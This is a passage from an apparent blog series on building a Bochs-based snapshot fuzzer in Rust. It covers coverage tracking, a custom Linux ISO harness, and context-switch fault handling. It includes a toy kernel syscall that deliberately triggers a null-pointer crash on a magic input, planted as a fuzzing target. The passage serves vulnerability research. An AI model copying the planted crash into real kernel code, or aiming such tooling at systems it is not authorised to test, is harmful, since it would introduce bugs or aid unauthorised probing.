            8..=15 => 16,
            16..=31 => 32,
            32..=127 => 64,
            128..=255 => 128,
        }
    }

    // Walk the coverage map in tandem with the history map looking for new
    // bucket thresholds for hitcounts or brand new coverage
    //    
    // Note: normally I like to write things as naively as possible, but we're
    // using chained iterator BS because the compiler spits out faster code
    pub fn update(&mut self) -> (bool, usize) {
        let mut new_coverage = false;
        let mut edge_count = 0;

        // Iterate over the current map that was updated by Bochs during the fuzzcase
        self.curr_map.iter_mut()                         

            // Use zip to add history map to the iterator, now we get tuple back
            .zip(self.history_map.iter_mut())

            // For the tuple pair
            .for_each(|(curr, hist)| {

                // If we got a hitcount of at least 1
                if *curr > 0 {

                    // Convert hitcount into bucket count
                    let bucket = CoverageMap::bucket(*curr);

                    // If the old record for this edge pair is lower, update
                    if *hist < bucket {
                        *hist = bucket;
                        new_coverage = true;
                    }

                    // Zero out the current map for next fuzzing iteration
                    *curr = 0;
                }
            });

        // If we have new coverage, take the time to walk the map again and 
        // count the number of edges we've hit
        if new_coverage {
            self.history_map.iter().for_each(|&hist| {
                if hist > 0 {
                    edge_count += 1;
                }
            });
        } 

        (new_coverage, edge_count)
    }
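To see what does and does not count as new coverage under this scheme, here is a small standalone sketch. The `bucket` table is repeated from above so the snippet compiles on its own; `is_new` is a hypothetical helper that mirrors the comparison in `update` without the clearing and edge counting.

```rust
/// Same bucketing table as above, repeated so this sketch is self-contained.
fn bucket(hitcount: u8) -> u8 {
    match hitcount {
        0 => 0,
        1 => 1,
        2 => 2,
        3 => 4,
        4..=7 => 8,
        8..=15 => 16,
        16..=31 => 32,
        32..=127 => 64,
        128..=255 => 128,
    }
}

/// Hypothetical helper: compare one run's raw hit counts against the history
/// map, raising the history where a higher bucket was reached.
fn is_new(hist: &mut [u8], curr: &[u8]) -> bool {
    let mut new_coverage = false;
    for (h, &c) in hist.iter_mut().zip(curr) {
        let b = bucket(c);
        if *h < b {
            *h = b;
            new_coverage = true;
        }
    }
    new_coverage
}
```

With this, hit counts of 100 and 101 fall into the same bucket and are indistinguishable, while going from 1 hit to 5 hits on the same edge crosses a bucket boundary and is reported as new coverage. A later run that hits the edge only 4 times reports nothing new, since the history already holds that bucket.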

That’s pretty much it for code coverage feedback, Bochs updates the map from instrumentation hooks in branching instruction handlers, and then Lucid analyzes the results at the end of a fuzzing iteration and clears the map for the next run. Stolen directly from the AFL universe.

Environment/Target Setup

Getting a target set up for a full-system snapshot fuzzer is always going to be a pain. It is going to be so specific to your needs, and a generic way to do this type of thing does not exist. It’s essentially the problem of harnessing, which remains unsolved generically. This is where all of the labor is for the end-user of a fuzzer. This is also where all the fun is though, lobotomizing your target so that it can be fuzzed is some of the funnest hacking I’ve ever done.

For Lucid, we need something Bochs can understand. Turns out it can run and boot iso files pretty easily, and since I’m mostly interested in fuzzing Linux kernel stuff, I decided to make a custom kernel and compile it into an iso to fuzz with Lucid. This worked extremely well and was very easy once I got the hang of creating iso files. As for a mature workflow, I think with this type of thing specifically, I would try to do the following:

Iteratively develop your harness/setup in QEMU-system since it’s faster, more mature, easier to use etc
Once completely done with your harness/setup, compile that setup to an .iso and run it in Lucid for fuzzing

That’s at least what I’ll be doing for Linux kernel stuff.

I developed a fun little toy syscall to fuzz as follows:

// Crash the kernel
void __crash(void)
{
	asm volatile("xchgw %sp, %sp");
	*(int *)0 = 0;
}

// Check to see if the input matches our criteria
void inspect_input(char *input, size_t data_len) {
	// Make sure we have enough data
	if (data_len < 6)
		return;
	
	if (input[0] == 'f')
		if (input[1] == 'u')
			if (input[2] == 'z')
				if (input[3] == 'z')
					if (input[4] == 'm')
						if (input[5] == 'e')
							__crash();

	return;
}

SYSCALL_DEFINE2(fuzzme, void __user *, data, size_t, data_len)
{
	char kernel_copy[1024] = { 0 };
	printk("Inside fuzzme syscall\n");

	// Make sure we don't overflow stack buffer
	if (data_len > 1024)
		data_len = 1024;

	// Copy the user data over
	if (copy_from_user(kernel_copy, data, data_len))
	{
		return -EFAULT;
	}

	// Inspect contents to try and crash
	inspect_input(kernel_copy, data_len);
	
	return 0;
}

I added a new syscall to the kernel called fuzzme with a syscall number of 451, then compiled a harness and stuffed it in /usr/bin/harness on the disk of the iso. I didn’t try to generically find a way to plumb up crashes to Lucid yet, I just put the special NOP instruction for signaling a crash in the __crash function instead. But with things like KASAN, I’m sure there will be some chokepoint I can use in the future as a catch-all for crashes. Weirdly, detecting crashes is not a trivial problem from the Bochs host level the way it is when the kernel sends your program a signal (obviously, some kernel oopses will signal your harness if you build it this way).

The harness was simple and was just the following:

#include <stdio.h>   // printf, perror
#include <string.h>  // memset
#include <unistd.h>  // syscall

#define __NR_fuzzme 451

#define LUCID_SIGNATURE { 0x13, 0x37, 0x13, 0x37, 0x13, 0x37, 0x13, 0x37, \
                          0x13, 0x38, 0x13, 0x38, 0x13, 0x38, 0x13, 0x38 }

#define MAX_INPUT_SIZE 1024UL

struct fuzz_input {
    unsigned char signature[16];
    size_t input_len;
    char input[MAX_INPUT_SIZE];
};

int main(int argc, char *argv[])
{
    struct fuzz_input fi = { 
        .signature = LUCID_SIGNATURE,
        .input_len = 8,
    };
    memset(&fi.input[0], 'A', 8);

    // Create snapshot
    asm volatile("xchgw %dx, %dx");

    // Call syscall we're fuzzing
    long ret = syscall(__NR_fuzzme, fi.input, *(size_t *)&fi.input_len);

    // Restore snapshot
    asm volatile("xchgw %bx, %bx");

    if (ret != 0) {
        perror("Syscall failed");
    } else {
        printf("Syscall success\n");
    }

    return 0;
}

I create a 128-bit signature value that Lucid can scan for in Bochs heap memory and learn the dimensions of the fuzzing input. Once I find the signature, I can insert inputs into Bochs from Lucid. This is also probably doable by using some Bochs logic to translate guest linear addresses to the physical memory in the host Bochs and then plumb those values up via GPR during the snapshot, but I haven’t done a lot of work there yet. This way also seems pretty generic? I’m not sure what people will prefer, we’ll see.
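As a rough illustration of the signature scan, the sketch below searches a byte slice for the 16-byte signature and reads the length field that follows it. This is not Lucid’s actual implementation: `locate_input` and `InputLocation` are hypothetical names, and the layout (16-byte signature, then an 8-byte little-endian `input_len`, then the input buffer) is an assumption based on how `struct fuzz_input` above would be laid out on x86-64.

```rust
const SIG_LEN: usize = 16;  // size of the signature array in the harness
const LEN_FIELD: usize = 8; // assumed sizeof(size_t) in the guest

/// Offsets, relative to the start of the scanned memory, of the pieces of
/// the harness struct the fuzzer would need to overwrite.
#[derive(Debug, PartialEq)]
pub struct InputLocation {
    pub len_offset: usize,
    pub input_offset: usize,
    pub input_len: usize,
}

/// Hypothetical helper: find the first occurrence of the signature and
/// decode the length field that sits right after it.
pub fn locate_input(mem: &[u8], sig: &[u8; SIG_LEN]) -> Option<InputLocation> {
    // Naive linear scan, one candidate window per byte offset
    let start = mem.windows(SIG_LEN).position(|w| w == &sig[..])?;
    let len_offset = start + SIG_LEN;
    let input_offset = len_offset + LEN_FIELD;

    // Bail out if the signature sits too close to the end of memory
    let mut raw = [0u8; LEN_FIELD];
    raw.copy_from_slice(mem.get(len_offset..input_offset)?);

    Some(InputLocation {
        len_offset,
        input_offset,
        input_len: u64::from_le_bytes(raw) as usize,
    })
}
```

Once the offsets are known, inserting a new input would presumably amount to writing the new length at `len_offset` and the new bytes at `input_offset` before each iteration.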

You can see the special NOP instructions for taking a snapshot and then restoring a snapshot. So we really only fuzz the syscall portion of the harness.

I basically followed this tutorial for building an iso with BusyBox: https://medium.com/@ThyCrow/compiling-the-linux-kernel-and-creating-a-bootable-iso-from-it-6afb8d23ba22. I compiled the harness statically and then copied that into /usr/bin/harness and then I can run that from vanilla Bochs with a GUI to save Bochs state to disk at the snapshot point we want to fuzz from.

I added my custom syscall to the Linux kernel at kernel/sys.c at the bottom of the source file for kernel version 6.0.1, and I added the harness to /usr/bin/harness in the initramfs from the tutorial. My file hierarchy for the iso when I went to create it is:

iso_files
  - boot
    - bzImage
    - initramfs.cpio.gz
    - grub
      - grub.cfg

bzImage is the compiled kernel image. initramfs.cpio.gz is the compressed initramfs file system we want in the virtual machine, you can create that by navigating to its root and doing something like find . | cpio -o -H newc | gzip > /path/to/iso_files/boot/initramfs.cpio.gz.

The contents of my grub.cfg file looked like this:

set default=0
set timeout=10
menuentry 'Lucid Linux' --class os {
    insmod gzio
    insmod part_msdos
    linux /boot/bzImage
    initrd /boot/initramfs.cpio.gz
}

Pointing grub-mkrescue at the iso_files dir will have it spit out the iso we want to run in Bochs: grub-mkrescue -o lucid_linux.iso iso_files/.

Here is what everything looks like from start to finish when you run the environment:

[devbox:~/git_bochs/Bochs/bochs]$ /tmp/gui_bochs -f bochsrc_gui.txt
========================================================================
                     Bochs x86 Emulator 2.8.devel
             Built from GitHub snapshot after release 2.8
                  Compiled on Jun 21 2024 at 14:42:29
========================================================================
00000000000i[      ] BXSHARE not set. using compile time default '/usr/local/share/bochs'
00000000000i[      ] reading configuration from bochsrc_gui.txt
------------------------------
Bochs Configuration: Main Menu
------------------------------

This is the Bochs Configuration Interface, where you can describe the
machine that you want to simulate.  Bochs has already searched for a
configuration file (typically called bochsrc.txt) and loaded it if it
could be found.  When you are satisfied with the configuration, go
ahead and start the simulation.

You can also start bochs with the -q option to skip these menus.

1. Restore factory default configuration
2. Read options from...
3. Edit options
4. Save options to...
5. Restore the Bochs state from...
6. Begin simulation
7. Quit now

Please choose one: [6] 

We’ll want to just begin simulation, so enter 6 here. When we do, we should eventually land on the GRUB screen where we choose what to boot into, and we just select Lucid Linux.

Once we boot and get our shell, I just have to call harness from the command line since it’s automatically in my $PATH and save the Bochs state to disk!

Please choose one: [6] 6
00000000000i[      ] installing sdl2 module as the Bochs GUI
00000000000i[SDL2  ] maximum host resolution: x=1704 y=1439
00000000000i[      ] using log file bochsout.txt
Saving Lucid snapshot to '/tmp/lucid_snapshot'...
Successfully saved snapshot

Now, /tmp/lucid_snapshot has all of the information to resume this saved Bochs state inside Lucid’s Bochs. We just need to go and comment out the display library line from /tmp/lucid_snapshot/config as follows:

# configuration file generated by Bochs
plugin_ctrl: unmapped=true, biosdev=true, speaker=true, extfpuirq=true, parallel=true, serial=true, e1000=false
config_interface: textconfig
#display_library: sdl2

Next, we just have to run Lucid and give it the right Bochs arguments to resume that saved state from disk: ./lucid --input-signature 0x13371337133713371338133813381338 --verbose --bochs-image /tmp/lucid_bochs --bochs-args -f /home/h0mbre/git_bochs/Bochs/bochs/bochsrc_nogui.txt -q -r /tmp/lucid_snapshot

Here are the contents of those configuration files, both for the GUI vanilla Bochs, and the one we pass here to Lucid’s Bochs, the only difference is the commented out display library line:

romimage: file="/home/h0mbre/git_bochs/Bochs/bochs/bios/BIOS-bochs-latest"
vgaromimage: file="/home/h0mbre/git_bochs/Bochs/bochs/bios/VGABIOS-lgpl-latest"
pci: enabled=1, chipset=i440fx
boot: cdrom
ata0-master: type=cdrom, path="/home/h0mbre/custom_linux/lucid_linux.iso", status=inserted
log: bochsout.txt
clock: sync=realtime, time0=local
cpu: model=corei7_skylake_x
cpu: count=1, ips=750000000, reset_on_triple_fault=1, ignore_bad_msrs=1
cpu: cpuid_limit_winnt=0
memory: guest=64, host=64
#display_library: sdl2

Really not much to it, you just have to put the iso in the right device and say that it’s inserted and you should be good to go. We can actually fuzz stuff now!

Conclusion

Now that it’s conceivable we can fuzz stuff with this, there are a lot of small changes that need to take place that I will work on in the future:

Mutator: Right now there is a stand-in toy mutator for demo purposes, and I think we actually won’t do any mutation stuff on this blog. I’ll probably add Brandon’s basic mutator to the fuzzer as the default, but I think I can make it bring-your-own input generator fairly easily with Rust traits, we’ll see on that. Maybe that will be a blogpost, who knows.
Corpus management: Right now there is none! That should be fairly trivial to do however, not worth a blogpost
Parallelization: This will be a fun blogpost I think, I’d like the fuzzer to be easily parallelizable and maybe distributed across nodes. I’d like to get this thing fuzzing on my servers I bought a few years ago and never used lol.
Redqueen: We have such easy access to the relevant instructions that we have to implement this feature, it’s a huge boost to efficiency.
LibAFL Integration: This will definitely be a blogpost, we want this to eventually serve as the execution engine for LibAFL.

Maybe in the next blogpost, we’ll try to fuzz a real target and find an N-Day? That would be fun if the input generation aspect isn’t too much labor. Let me know what you want to see, until next time.

Fuzzer Development 3: Building Bochs, MMU, and File I/O

2024-03-05T00:00:00+00:00

Background

Introduction

We’re continuing today on our journey to develop our fuzzer. Last time we left off, we had developed the beginnings of a context-switching infrastructure so that we could sandbox Bochs (really a test program) from touching the OS kernel during syscalls.

In this post, we’re going to go over some changes and advancements we’ve made to the fuzzer and also document some progress related to Bochs itself.

Syscall Infrastructure Update

After putting out the last blogpost, I got some really good feedback and suggestions from Fuzzing discord legend WorksButNotTested, who informed me that we could cut down on a lot of complexity if we scrapped the full context-switching/C-ABI-to-Syscall-ABI-Register-Translation routines altogether and simply had Bochs call a Rust function from C for syscalls. This is very intuitive and obvious in hindsight and I’m admittedly a little embarrassed to have overlooked this possibility.

Previously, in our custom Musl code, we would have a C function call like so:

static __inline long __syscall6(long n, long a1, long a2, long a3, long a4, long a5, long a6)
{
	unsigned long ret;
	register long r10 __asm__("r10") = a4;
	register long r8 __asm__("r8") = a5;
	register long r9 __asm__("r9") = a6;
	__asm__ __volatile__ ("syscall" : "=a"(ret) : "a"(n), "D"(a1), "S"(a2),
						  "d"(a3), "r"(r10), "r"(r8), "r"(r9) : "rcx", "r11", "memory");
	return ret;
}

This is the function that is called when the program needs to make a syscall with 6 arguments. In the previous blog, we changed this function to be an if/else such that if the program was running under Lucid, we would instead call into Lucid’s context-switch function after shuffling the C ABI registers to Syscall registers like so:

static __inline long __syscall6_original(long n, long a1, long a2, long a3, long a4, long a5, long a6)
{
	unsigned long ret;
	register long r10 __asm__("r10") = a4;
	register long r8  __asm__("r8")  = a5;
	register long r9  __asm__("r9")  = a6;
	__asm__ __volatile__ ("syscall" : "=a"(ret) : "a"(n), "D"(a1), "S"(a2), "d"(a3), "r"(r10),
							"r"(r8), "r"(r9) : "rcx", "r11", "memory");

	return ret;
}

static __inline long __syscall6(long n, long a1, long a2, long a3, long a4, long a5, long a6)
{
    if (!g_lucid_ctx) { return __syscall6_original(n, a1, a2, a3, a4, a5, a6); }
	
    register long ret;
    register long r12 __asm__("r12") = (size_t)(g_lucid_ctx->exit_handler);
    register long r13 __asm__("r13") = (size_t)(&g_lucid_ctx->register_bank);
    register long r14 __asm__("r14") = SYSCALL;
    register long r15 __asm__("r15") = (size_t)(g_lucid_ctx);
    
    __asm__ __volatile__ (
        "mov %1, %%rax\n\t"
	"mov %2, %%rdi\n\t"
	"mov %3, %%rsi\n\t"
	"mov %4, %%rdx\n\t"
	"mov %5, %%r10\n\t"
	"mov %6, %%r8\n\t"
	"mov %7, %%r9\n\t"
        "call *%%r12\n\t"
        "mov %%rax, %0\n\t"
        : "=r" (ret)
        : "r" (n), "r" (a1), "r" (a2), "r" (a3), "r" (a4), "r" (a5), "r" (a6),
		  "r" (r12), "r" (r13), "r" (r14), "r" (r15)
        : "rax", "rcx", "r11", "memory"
    );
	
	return ret;
}

So this was quite involved. I was very fixated on the idea that “Lucid has to be the kernel. And when userland programs execute a syscall, their state is saved and execution is started in the kernel”. This led me astray, since such a complicated routine is not needed for our purposes. We are not actually a kernel, we just want to sandbox away syscalls for one specific program that behaves pretty well. WorksButNotTested instead suggested just calling a Rust function like so:

static __inline long __syscall6(long n, long a1, long a2, long a3, long a4, long a5, long a6)
{
	if (g_lucid_syscall)
		return g_lucid_syscall(g_lucid_ctx, n, a1, a2, a3, a4, a5, a6);
	
	unsigned long ret;
	register long r10 __asm__("r10") = a4;
	register long r8 __asm__("r8") = a5;
	register long r9 __asm__("r9") = a6;
	__asm__ __volatile__ ("syscall" : "=a"(ret) : "a"(n), "D"(a1), "S"(a2),
						  "d"(a3), "r"(r10), "r"(r8), "r"(r9) : "rcx", "r11", "memory");
	return ret;
}

Obviously this is a much simpler solution and we get to avoid scrambling registers/saving state/inline-assembly and the rest of it. To set this function up, we simply created a new function pointer global variable in lucid.h in Musl and gave it a definition in src/lucid.c, which you can see in the Musl patches in the repo. g_lucid_syscall looks like this on the Rust side:

pub extern "C" fn lucid_syscall(contextp: *mut LucidContext, n: usize,
    a1: usize, a2: usize, a3: usize, a4: usize, a5: usize, a6: usize)
    -> u64 

We get to use the C ABI to our advantage and maintain the semantics of how a program would normally use Musl, and it’s just a very much appreciated suggestion and I couldn’t be happier with how it turned out.
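To show the general shape of such a handler, here is a minimal sketch of what a function with that signature could do. The body is entirely hypothetical: the stand-in `LucidContext` with its `syscalls_seen` field, the made-up pid, and the choice to answer everything else with `-ENOSYS` are assumptions for illustration, not Lucid’s real behavior. The constants are the Linux x86-64 values for `getpid` and `ENOSYS`.

```rust
/// Stand-in for the real execution context, only here so the sketch compiles.
#[repr(C)]
pub struct LucidContext {
    pub syscalls_seen: usize, // hypothetical field, not from the post
}

const SYS_GETPID: usize = 39; // Linux x86-64 syscall number for getpid
const ENOSYS: i64 = 38;       // Linux errno for "function not implemented"

/// Hypothetical handler using the same signature as shown above. Musl calls
/// this through the g_lucid_syscall function pointer instead of executing
/// the `syscall` instruction.
pub extern "C" fn lucid_syscall(contextp: *mut LucidContext, n: usize,
    _a1: usize, _a2: usize, _a3: usize, _a4: usize, _a5: usize, _a6: usize)
    -> u64
{
    // The caller is trusted to hand us a valid, exclusive context pointer
    let context = unsafe { &mut *contextp };
    context.syscalls_seen += 1;

    match n {
        // Answer from the sandbox without touching the host kernel
        SYS_GETPID => 1337,
        // Anything we do not emulate fails the way the kernel would: the
        // negated errno travels back in the return register
        _ => (-ENOSYS) as u64,
    }
}
```

Because the return value follows the raw syscall convention, Musl’s existing wrappers can keep translating negative values into `errno` without knowing that anything changed underneath them.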

Calling Convention Changes

During this refactoring for syscalls, I also simplified the way our context-switching calling convention would work. Instead of using 4 separate registers for the calling convention, I decided it was doable by just passing a pointer to the Lucid execution context and having the context_switch function itself work out how it should behave based on the context’s values. In essence, we’re moving complexity from the caller-side to the callee-side. This means that the complexity doesn’t keep recurring throughout the codebase, it is encapsulated one time, in the context_switch logic itself. This does require some hacky/brittle code however, for instance we have to hardcode some struct offsets for the Lucid execution data structure, but that is a small price to pay in my opinion for drastically reduced complexity. The context_switch code has been changed to the following:

extern "C" { fn context_switch(); }
global_asm!(
    ".global context_switch",
    "context_switch:",

    // Save the CPU flags before we do any operations
    "pushfq",

    // Save registers we use for scratch
    "push r14",
    "push r13",

    // Determine what execution mode we're in
    "mov r14, r15",
    "add r14, 0x8",     // mode is at offset 0x8 from base
    "mov r14, [r14]",
    "cmp r14d, 0x0",
    "je save_bochs",

    // We're in Lucid mode so save Lucid GPRs
    "save_lucid: ",
    "mov r14, r15",
    "add r14, 0x10",    // lucid_regs is at offset 0x10 from base
    "jmp save_gprs",             

    // We're in Bochs mode so save Bochs GPRs
    "save_bochs: ",
    "mov r14, r15",
    "add r14, 0x90",    // bochs_regs is at offset 0x90 from base
    "jmp save_gprs",

You can see that once we hit the context_switch function we save the CPU flags before we do anything that would affect them, then we save a couple of registers that we use as scratch registers. Then we’re free to check the value of context->mode in order to determine what mode of execution we’re in. Based on that value, we are able to know what register bank to use to save our general-purpose registers. So yes, we do have to hardcode some offsets, but I believe overall this is a much better API and system for context-switching callees and the data-structure itself should be relatively stable at this point and not require massive refactoring.
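One way to make the hardcoded offsets a little less brittle is to check them against the struct layout in a test. The sketch below is an illustration under stated assumptions: `Ctx` is a hypothetical, trimmed-down stand-in for `LucidContext`, with a field order and field sizes guessed from the offsets in the assembly comments (0x8, 0x10, 0x90) and a 16-entry GPR bank. `offset_of_field` and `check_offsets` are made-up helper names, and the numbers assume a 64-bit target.

```rust
/// Hypothetical stand-in for the start of the execution context. Only the
/// offsets matter here, not the real field types.
#[repr(C)]
pub struct Ctx {
    pub context_switch: usize, // expected at 0x00
    pub mode: u32,             // expected at 0x08, padded out to 8 bytes
    pub lucid_regs: [u64; 16], // expected at 0x10 (16 GPRs * 8 bytes)
    pub bochs_regs: [u64; 16], // expected at 0x90
}

/// Byte offset of a field, computed from a live instance of the struct.
fn offset_of_field<T, F>(base: &T, field: &F) -> usize {
    field as *const F as usize - base as *const T as usize
}

/// Returns the offsets the assembly relies on, in declaration order.
pub fn check_offsets() -> [usize; 4] {
    let c = Ctx {
        context_switch: 0,
        mode: 0,
        lucid_regs: [0; 16],
        bochs_regs: [0; 16],
    };
    [
        offset_of_field(&c, &c.context_switch),
        offset_of_field(&c, &c.mode),
        offset_of_field(&c, &c.lucid_regs),
        offset_of_field(&c, &c.bochs_regs),
    ]
}
```

Asserting that `check_offsets()` equals `[0x0, 0x8, 0x10, 0x90]` in a unit test would catch the case where someone reorders or resizes a field without updating the assembly.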

Introducing Faults

Since the last blog-post, I’ve introduced the concept of Fault which is an error class that is reserved for instances when some sort of error is encountered during either context-switching code or syscall-handling. This error is distinct from our highest-level error LucidErr. Ultimately, these faults are plumbed back up to Lucid when they are encountered so that Lucid can handle them. As of this moment, Lucid calls any Fault fatal.

We are able to plumb these back up to Lucid because before starting Bochs execution we now save Lucid’s state and context-switch into starting Bochs:

#[inline(never)]
pub fn start_bochs(context: &mut LucidContext) {
    // Set the execution mode and the reason why we're exiting the Lucid VM
    context.mode = ExecMode::Lucid;
    context.exit_reason = VmExit::StartBochs;

    // Set up the calling convention and then start Bochs by context switching
    unsafe {
        asm!(
            "push r15", // Callee-saved register we have to preserve
            "mov r15, {0}", // Move context into R15
            "call qword ptr [r15]", // Call context_switch
            "pop r15",  // Restore callee-saved register
            in(reg) context as *mut LucidContext,
        );
    }
}

We make some changes to the execution context, namely marking the execution mode (Lucid-mode) and setting the reason why we’re context-switching (to start Bochs). Then in the inline assembly, we call the function pointer at offset 0 in the execution context structure:

// Execution context that is passed between Lucid and Bochs that tracks
// all of the mutable state information we need to do context-switching
#[repr(C)]
#[derive(Clone)]
pub struct LucidContext {
    pub context_switch: usize,  // Address of context_switch()

So then our Lucid state is saved in the context_switch routine and we are then passed to this logic:

// Handle Lucid context switches here
    if LucidContext::is_lucid_mode(context) {
        match exit_reason {
            // Dispatch to Bochs entry point
            VmExit::StartBochs => {
                jump_to_bochs(context);
            },
            _ => {
                fault!(context, Fault::BadLucidExit);
            }
        }
    }

Finally, we call jump_to_bochs:

// Standalone function to literally jump to Bochs entry and provide the stack
// address to Bochs
fn jump_to_bochs(context: *mut LucidContext) {
    // RDX: we have to clear this register as the ABI specifies that exit
    // hooks are set when rdx is non-null at program start
    //
    // RAX: arbitrarily used as a jump target to the program entry
    //
    // RSP: Rust does not allow you to use 'rsp' explicitly with in(), so we
    // have to manually set it with a `mov`
    //
    // R15: holds a pointer to the execution context, if this value is non-
    // null, then Bochs learns at start time that it is running under Lucid
    //
    // We don't really care about execution order as long as we specify clobbers
    // with out/lateout, that way the compiler doesn't allocate a register we 
    // then immediately clobber
    unsafe {
        asm!(
            "xor rdx, rdx",
            "mov rsp, {0}",
            "mov r15, {1}",
            "jmp rax",
            in(reg) (*context).bochs_rsp,
            in(reg) context,
            in("rax") (*context).bochs_entry,
            lateout("rax") _,   // Clobber (inout so no conflict with in)
            out("rdx") _,       // Clobber
            out("r15") _,       // Clobber
        );
    }
}

Full-blown context-switching like this allows us to encounter a Fault and then pass that error back to Lucid for handling. In the fault_handler, we set the Fault type in the execution context, and then we attempt to restore execution back to Lucid:

// Where we handle faults that may occur when context-switching from Bochs. We
// just want to make the fault visible to Lucid so we set it in the context,
// then we try to restore Lucid execution from its last-known good state
pub fn fault_handler(contextp: *mut LucidContext, fault: Fault) {
    let context = unsafe { &mut *contextp };
    match fault {
        Fault::Success => context.fault = Fault::Success,
        ...
    }

    // Attempt to restore Lucid execution
    restore_lucid_execution(contextp);
}

// We use this function to restore Lucid execution to its last known good state
// This is just really trying to plumb up a fault to a level that is capable of
// discerning what action to take. Right now, we probably just call it fatal. 
// We don't really deal with double-faults, it doesn't make much sense at the
// moment when a single-fault will likely be fatal already. Maybe later?
fn restore_lucid_execution(contextp: *mut LucidContext) {
    let context = unsafe { &mut *contextp };
    
    // Fault should be set, but change the execution mode now since we're
    // jumping back to Lucid
    context.mode = ExecMode::Lucid;

    // Restore extended state
    let save_area = context.lucid_save_area;
    let save_inst = context.save_inst;
    match save_inst {
        SaveInst::XSave64 => {
            // Retrieve XCR0 value, this will serve as our save mask
            let xcr0 = unsafe { _xgetbv(0) };

            // Call xrstor to restore the extended state from Lucid's save area
            unsafe { _xrstor64(save_area as *const u8, xcr0); }             
        },
        SaveInst::FxSave64 => {
            // Call fxrstor to restore the extended state from Lucid's save area
            unsafe { _fxrstor64(save_area as *const u8); }
        },
        _ => (), // NoSave
    }

    // Next, we need to restore our GPRs. This is kind of different order than
    // returning from a successful context switch since normally we'd still be
    // using our own stack; however right now, we still have Bochs' stack, so
    // we need to recover our own Lucid stack which is saved as RSP in our 
    // register bank
    let lucid_regsp = &context.lucid_regs as *const _;

    // Move that pointer into R14 and restore our GPRs. After that we have the
    // RSP value that we saved when we called into context_switch, this RSP was
    // then subtracted from by 0x8 for the pushfq operation that comes right
    // after. So in order to recover our CPU flags, we need to manually sub
    // 0x8 from the stack pointer. Pop the CPU flags back into place, and then 
    // return to the last known good Lucid state
    unsafe {
        asm!(
            "mov r14, {0}",
            "mov rax, [r14 + 0x0]",
            "mov rbx, [r14 + 0x8]",
            "mov rcx, [r14 + 0x10]",
            "mov rdx, [r14 + 0x18]",
            "mov rsi, [r14 + 0x20]",
            "mov rdi, [r14 + 0x28]",
            "mov rbp, [r14 + 0x30]",
            "mov rsp, [r14 + 0x38]",
            "mov r8, [r14 + 0x40]",
            "mov r9, [r14 + 0x48]",
            "mov r10, [r14 + 0x50]",
            "mov r11, [r14 + 0x58]",
            "mov r12, [r14 + 0x60]",
            "mov r13, [r14 + 0x68]",
            "mov r15, [r14 + 0x78]",
            "mov r14, [r14 + 0x70]",
            "sub rsp, 0x8",
            "popfq",
            "ret",
            in(reg) lucid_regsp,
        );
    }
}
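
The offsets in the asm above imply a register bank of sixteen 8-byte slots. Here is a minimal sketch of such a layout, assuming a hypothetical `RegisterBank` struct and `field_offset` helper; the field order is inferred from the offsets in the asm, not copied from Lucid's source:

```rust
// Hypothetical register bank mirroring the offsets used by the asm above.
// The field order is inferred from those offsets, not taken from Lucid.
#[repr(C)]
#[derive(Default, Clone, Copy, Debug)]
pub struct RegisterBank {
    pub rax: u64, // 0x00
    pub rbx: u64, // 0x08
    pub rcx: u64, // 0x10
    pub rdx: u64, // 0x18
    pub rsi: u64, // 0x20
    pub rdi: u64, // 0x28
    pub rbp: u64, // 0x30
    pub rsp: u64, // 0x38
    pub r8: u64,  // 0x40
    pub r9: u64,  // 0x48
    pub r10: u64, // 0x50
    pub r11: u64, // 0x58
    pub r12: u64, // 0x60
    pub r13: u64, // 0x68
    pub r14: u64, // 0x70
    pub r15: u64, // 0x78
}

// Byte offset of a field relative to the start of the bank
pub fn field_offset(bank: &RegisterBank, field: &u64) -> usize {
    field as *const u64 as usize - bank as *const RegisterBank as usize
}
```

Note that the asm loads r15 before r14: r14 holds the base pointer for every other load, so it has to be overwritten last.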

As you can see, restoring Lucid state and resuming execution is quite involved. One tricky thing we had to deal with was the fact that when a Fault occurs, we are likely operating in Bochs mode, which means that our stack is Bochs’ stack and not Lucid’s. So even though this is technically just a context-switch, we had to change the order around a little bit to restore Lucid’s saved state into our current state and resume execution. Now when Lucid calls functions that context-switch, it can simply check the “return” value of such functions by checking if there was a Fault noted in the execution context like so:

    // Start executing Bochs
    prompt!("Starting Bochs...");
    start_bochs(&mut lucid_context);

    // Check to see if any faults occurred during Bochs execution
    if !matches!(lucid_context.fault, Fault::Success) {
        fatal!(LucidErr::from_fault(lucid_context.fault));
    }

Pretty neat imo!
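
Stripped of the context-switching machinery, the pattern is "record the outcome in the context, let the caller inspect it afterwards". A minimal sketch, assuming simplified stand-ins for Lucid's types; only `Fault::Success`, `Fault::Syscall`, and the `fault` field appear in the post, while `Context`, `run_guest`, and `check_fault` are hypothetical names:

```rust
// Simplified stand-ins for Lucid's types, for illustration only
#[derive(Clone, Copy, Debug, PartialEq)]
pub enum Fault {
    Success,
    Syscall,
}

pub struct Context {
    pub fault: Fault,
}

// Pretend to run guest code. The outcome is recorded in the context rather
// than returned, since a real context switch has no normal return path.
pub fn run_guest(context: &mut Context, should_fail: bool) {
    context.fault = if should_fail { Fault::Syscall } else { Fault::Success };
}

// Caller-side check that turns the recorded fault into a Result
pub fn check_fault(context: &Context) -> Result<(), Fault> {
    if !matches!(context.fault, Fault::Success) {
        return Err(context.fault);
    }
    Ok(())
}
```

Converting the recorded fault into a `Result` at the call site keeps the rest of the caller's error handling conventional.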

Sandboxing Thread-Local-Storage

Coming into this project, I honestly didn’t know much about thread-local-storage (TLS) except that it was some magic per-thread area of memory that did stuff. That is still the entirety of my knowledge really, except now I’ve seen some code that allocates that memory and initializes it, which helps me appreciate what is really going on. Once I implemented the Fault system discussed above, I noticed that Lucid would segfault when exiting. After some debugging, I realized it was calling a function pointer that was a bogus address. How could this have happened? Well, after some digging, I noticed that right before that function call, an offset of the fs register was used to load the address from memory. Typically, fs is used to access TLS. So at that point, I had a strong suspicion that Bochs had somehow corrupted the value of my fs register. So I did a quick grep through Musl looking for fs register access and found the following:

/* Copyright 2011-2012 Nicholas J. Kain, licensed under standard MIT license */
.text
.global __set_thread_area
.hidden __set_thread_area
.type __set_thread_area,@function
__set_thread_area:
	mov %rdi,%rsi           /* shift for syscall */
	movl $0x1002,%edi       /* SET_FS register */
	movl $158,%eax          /* set fs segment to */
	syscall                 /* arch_prctl(SET_FS, arg)*/
	ret

